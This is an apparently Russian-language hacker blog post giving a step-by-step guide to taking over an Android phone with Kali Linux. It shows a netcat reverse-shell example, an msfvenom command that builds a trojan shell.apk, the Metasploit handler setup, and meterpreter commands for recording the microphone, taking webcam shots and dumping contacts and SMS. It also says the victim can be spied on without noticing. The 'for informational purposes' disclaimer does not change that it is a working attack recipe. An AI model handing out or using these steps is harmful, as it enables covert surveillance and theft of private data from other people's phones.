Добавить в корзинуПозвонить
Найти в Дзене
Заметки Хакера

Получаем доступ к Android [Kali Linux]

Только для ознакомительных целях, дабы бы не попались на это! Принцип работы Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux. Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале: nc -l -p 8577 Жертва в свою очередь подключается к этому открытому порту: nc 192.168.1.1 8577 -e /bin/bash Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы. Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть. Создание payload Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно

Только для ознакомительных целях, дабы бы не попались на это!

Принцип работы

Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:

nc -l -p 8577

Жертва в свою очередь подключается к этому открытому порту:

nc 192.168.1.1 8577 -e /bin/bash

Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.

Создание payload

Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:

msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk

После выполнения команды в корневой директории будет создан файл shell.apk.

-2

Далее необходимо запустить msfconsole.

msfconsole

После этого последовательно выполняем все команды:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ВашIP
set LPORT 4444
exploit

После этого, человек должен запусить shell.apk.

Некоторые полезные команды:

record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate

После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.

Заметки Хакера - ПОДПИШИСЬ